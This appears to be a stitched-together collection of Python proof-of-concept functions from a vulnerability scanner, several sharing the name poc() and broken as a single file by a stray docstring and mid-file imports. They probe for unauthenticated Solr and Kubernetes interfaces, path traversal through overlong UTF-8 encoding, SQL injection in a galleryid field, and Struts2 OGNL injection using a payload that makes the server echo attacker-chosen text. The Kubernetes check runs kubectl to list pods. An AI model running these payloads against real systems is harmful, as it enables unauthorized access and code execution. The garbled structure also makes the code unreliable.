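def poc(target):
    """Probe *target* for an exposed Solr admin dashboard.

    A target without a scheme is given ``http://``. Each candidate produced by
    ``iterate_path`` is requested as-is and then again with ``/solr/``
    appended. A response is a hit when it is HTTP 200 and its body contains
    both ``Solr Admin`` and ``Dashboard``.

    Returns the first matching URL, or ``False`` when nothing matched.
    """
    base_url = target if "://" in target else 'http://' + target
    for each in iterate_path(base_url):
        try:
            # Candidate first, then its /solr/ child; a failure on the first
            # request skips the second, as both sit in the same try block.
            for url in (each, each + '/solr/'):
                # The timeout keeps one unresponsive host from stalling the run.
                g = requests.get(url, headers={'User-Agent': firefox()}, timeout=10)
                # Compare the status by value: ``is 200`` only works through
                # CPython's small-integer cache.
                # NOTE(review): on Python 3 g.content is bytes, so these str
                # membership tests raise TypeError, which the except below
                # swallows - confirm the interpreter this runs on.
                if g.status_code == 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                    return url
        except Exception:
            # Best effort: an unreachable or misbehaving candidate is skipped.
            pass
    return False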
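def poc(url):
    """Check a ``host:port`` target for an unauthenticated Solr admin page.

    Targets on the ports in ``portlist`` are skipped. Port 443 and 8443 are
    probed over HTTPS, everything else over HTTP. The paths ``/`` and
    ``/solr/`` are requested in turn; a hit is HTTP 200 with both
    ``Solr Admin`` and ``Dashboard`` in the body.

    Returns ``'[solr unauth]\\t' + url`` for the first hit, otherwise ``False``
    (also for a target without a numeric port or on any request error).
    """
    # Ports that normally carry non-HTTP services; not worth an HTTP request.
    portlist = [
        '21', '22', '23', '25', '53', '110', '137', '161', '389', '445',
        '873', '1090', '1099', '1433', '1521', '2049', '2181', '2222', '2375',
        '3306', '3389', '5432', '5901', '5984', '6379', '11211', '27017'
    ]
    parts = url.split(':')
    # A missing or non-numeric port used to raise IndexError / ValueError.
    if len(parts) < 2 or not parts[1].isdigit():
        return False
    port = parts[1]
    if port in portlist:
        return False
    if int(port) == 443:
        base = 'https://' + parts[0]
    elif int(port) == 8443:
        base = 'https://' + url
    else:
        base = 'http://' + url

    try:
        # Suppress the InsecureRequestWarning caused by verify=False below.
        requests.packages.urllib3.disable_warnings()
        for path in ('/', '/solr/'):
            # Build every probe from the unchanged base; appending to the
            # previous probe produced ".../" + "/solr/" on the second pass.
            probe = base + path
            # verify=False: the certificate is not validated, so a hit says
            # what answered at this address, not that the host is authentic.
            g = requests.get(probe, headers={'User-Agent': firefox()}, verify=False, timeout=5)
            if g.status_code == 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                return '[solr unauth]\t' + probe
    except Exception:
        # Any request failure ends the check for this target.
        return False
    return False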
def poc(url):
    """Request a MANIFEST.MF through an overlong-encoded ``..`` path segment.

    The target is normalised to a scheme plus whatever ``get_domain`` returns.
    ``%c0%ae`` is the overlong UTF-8 form of ``.``, so the probe path reaches
    ``META-INF/MANIFEST.MF`` only on a server that decodes it as ``..``.

    Returns ``True`` when the response body contains ``Version``, ``False``
    otherwise or when the request fails.
    """
    target = url if '://' in url else 'http://' + url
    root = get_domain(target)
    probe_path = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
    try:
        response = requests.get(root + probe_path, headers={'User-Agent': firefox()}, timeout=10)
        body = response.content
    except Exception:
        return False
    # NOTE(review): the status code is not checked and 'Version' is a generic
    # word, so an error page containing it also reports True - worth
    # confirming hits by hand.
    return 'Version' in body
def poc(url):
    """Send a ``debug=browser`` OGNL echo probe to a ``.action`` endpoint.

    The query string is dropped from *url*; when the URL has no ``.action``
    it is passed through ``redirectURL`` first. The request asks the server to
    print a random key into the response.

    Returns *url* when the key comes back and ``xwork2.dispatcher`` does not
    (presumably to discard pages that merely reflect the query string),
    ``False`` when the request raises, and ``None`` when the response does not
    match.
    """
    if '://' not in url:
        url = 'http://' + url
    # split() returns the whole string when there is no '?', so no guard.
    url = url.split('?')[0]
    if '.action' not in url:
        url = redirectURL(url)
    key = randomString()
    # NOTE(review): '[email protected]' inside the literal looks like an
    # artefact of how this page was rendered; it is reproduced unchanged.
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = url + payload
    try:
        response = requests.get(target, headers={'User-Agent': firefox()}, timeout=5)
        c = response.content
        echoed = key in c
        reflected = 'xwork2.dispatcher' in c
        if echoed and not reflected:
            return url
    except Exception:
        return False
    # No match: falls off the end and returns None, as the original does.
def poc(url):
    """Send a ``debug=browser`` OGNL echo probe and log request failures.

    The query string is dropped from *url*; when the URL has no ``.action``
    it is passed through ``redirectURL`` first. The request asks the server to
    print a random key into the response.

    Returns *url* when the key comes back and ``xwork2.dispatcher`` does not.
    Every other path, including a request error (logged at debug level),
    returns ``None``.
    """
    if '://' not in url:
        url = 'http://' + url
    # split() returns the whole string when there is no '?', so no guard.
    url = url.split('?')[0]
    if '.action' not in url:
        url = redirectURL(url)
    key = randomString()
    # NOTE(review): '[email protected]' inside the literal looks like an
    # artefact of how this page was rendered; it is reproduced unchanged.
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = url + payload
    try:
        body = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content
        if 'xwork2.dispatcher' in body:
            # The marker class name is present, so this is not counted.
            return None
        if key in body:
            return url
    except Exception as e:
        logging.debug(e)
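def poc(url):
    """Boolean-based SQL injection check on the ``galleryid`` form field.

    ``get_entry`` resolves the endpoint to test; ``False`` is returned when it
    finds none. When ``CHECK_WAF`` is set and ``has_waf`` reports a WAF, an
    "Uncertain" string is returned instead of probing. Otherwise two POSTs are
    sent that differ only in the injected condition (``1=1`` versus ``1=2``).

    Returns ``True`` when both responses are HTTP 200 and their body lengths
    differ, ``False`` otherwise or when a request fails.
    """
    target = get_entry(url)
    if not target:
        return False
    if CHECK_WAF and has_waf(target):
        return '[Uncertain,WAF detected!] ' + get_domain(target)
    data_temp = "page=1&galleryid=[P]&task=load_videos_content&perpage=20&linkbutton=2"
    # Content-Type needed
    headers = {'User-Agent': firefox(), 'Content-Type': 'application/x-www-form-urlencoded'}
    try:
        # The timeout keeps an unresponsive endpoint from hanging the check.
        r1 = requests.post(target, headers=headers,
                           data=data_temp.replace('[P]', '-1 OR 1=1'), timeout=10)
        r2 = requests.post(target, headers=headers,
                           data=data_temp.replace('[P]', '-1 OR 1=2'), timeout=10)
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit and made the run hard to stop.
        return False
    # NOTE(review): a length difference alone is a weak signal; pages that
    # embed timestamps or tokens differ between any two requests - confirm
    # hits with a third, identical request.
    if r1.status_code == r2.status_code == 200 and len(r1.content) != len(r2.content):
        return True
    return False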
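def poc(url):
    """Check whether a Kubernetes API endpoint answers without credentials.

    The URL is first fetched over HTTP(S). If the body lists both ``healthz``
    and ``metrics``, ``kubectl`` is pointed at the same URL and asked for the
    pods in all namespaces. The endpoint is reported when that output contains
    neither a username prompt nor a server error.

    Returns *url* on a hit, ``False`` otherwise (including any error).
    """
    if '://' not in url:
        url = 'http://' + url
    # NOTE(review): substring test - it also fires for 8443 or a host name
    # that happens to contain "443".
    if '443' in url:
        url = url.replace('http:', 'https:')
    try:
        # verify=False: the certificate is not validated for this probe.
        g = requests.get(url, headers={'User-Agent': firefox()}, timeout=3, verify=False)
        # Compare the status by value: ``is 200`` relies on CPython's
        # small-integer cache.
        if g.status_code == 200 and 'healthz' in g.content and 'metrics' in g.content:
            # The target string comes from scan input, so it must never reach
            # a shell: pass an argv list and leave shell=False, otherwise
            # shell metacharacters in the target would run as commands on the
            # scanning host.
            cmd = ['kubectl', '-s', url, 'get', 'pods',
                   '--all-namespaces=true', '-o=wide']
            # The with block closes the /dev/null handle that was leaked before.
            with open("/dev/null", "w") as devnull:
                pods = subprocess.Popen(
                    cmd,
                    stdout=subprocess.PIPE,
                    stdin=subprocess.PIPE,
                    stderr=devnull)
                output = pods.communicate()[0].decode("utf-8")
            if "Please enter Username" not in output and "Error from server" not in output:
                return url
    except Exception:
        # Best effort: any failure counts as "not confirmed".
        pass
    return False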
"""
import requests
from plugin.useragent import firefox
from plugin.util import randomString, redirectURL


def poc(url):
    """Send a ``debug=browser`` OGNL echo probe to a ``.action`` endpoint.

    The query string is dropped from *url*; when the URL has no ``.action``
    it is passed through ``redirectURL`` first, and a failure there ends the
    check. The request asks the server to print a random key into the
    response.

    Returns *url* when the key comes back and ``xwork2.dispatcher`` does not,
    ``False`` in every other case.
    """
    if '://' not in url:
        url = 'http://' + url
    # split() returns the whole string when there is no '?', so no guard.
    url = url.split('?')[0]
    if '.action' not in url:
        try:
            url = redirectURL(url)
        except Exception:
            return False
    key = randomString()
    # NOTE(review): '[email protected]' inside the literal looks like an
    # artefact of how this page was rendered; it is reproduced unchanged.
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = url + payload
    try:
        reply = requests.get(target, headers={'User-Agent': firefox()}, timeout=5)
        c = reply.content
        key_echoed = key in c
        marker_present = 'xwork2.dispatcher' in c
        if key_echoed and not marker_present:
            return url
    except Exception:
        return False
    return False